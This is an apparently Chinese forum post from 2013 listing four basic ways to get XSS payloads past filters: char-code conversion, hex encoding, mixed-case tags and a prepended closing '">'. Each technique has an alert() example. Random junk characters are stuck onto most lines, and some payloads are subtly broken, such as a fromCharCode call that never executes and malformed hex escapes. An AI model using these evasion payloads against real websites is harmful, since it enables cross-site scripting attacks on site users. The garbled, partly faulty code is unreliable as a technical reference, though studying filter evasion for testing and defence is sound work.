四种超级基础的绕过方法。
/ p9 q& z- O C" S1.转换为ASCII码+ H, H$ s) e3 O0 z- n& ?7 d( k
例子:原脚本为<script>alert(‘I love F4ck’)</script >6 y" ~7 d7 B: q0 V% p+ W
通过转换,变成:5 P4 z, i. e4 j, A
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>+ a; I$ j5 \+ j
, N$ r3 [3 o( {8 }, A) e0 m2.转换为HEX(十六进制)# f* t" R2 ^2 j0 ? ]0 Y8 n
例子:原脚本为<script>alert(‘I love F4ck’)</script>
" y! g! Z' S' I通过转换,变成:
$ r) a3 A2 s: C%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e c( Y; v) H- ]# E M9 A
8 ~ Y) p3 ~: `& V
3.转换脚本的大小写& r; c0 i& H% m3 ~& v
例子:原脚本为<script>alert(‘I love F4ck’)</script>3 ?; |4 ^- z6 J" W# c) [, D. W
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>+ k1 _7 n3 v& Q; y0 j7 b, z& K
3 @+ ^* L5 R. M
4.增加闭合标记”>
- _$ g5 j" Z2 A* u3 }. M8 {% J9 Q例子:原脚本为<script>alert(‘I love F4ck’)</script>( g& c- R6 V3 d6 n; Q% z
转换为:”><script>alert(‘I love F4ck’)</script>' w' E+ ^6 s s5 `" A0 _8 p/ M
更详细绕过技术请参考此网页
( S+ Y5 X) N* ^4 g, a- Jhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
1 F3 ^3 d6 V$ j
# l8 [% w- O$ S2 ?0 F- f* o转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
分享
支持
反对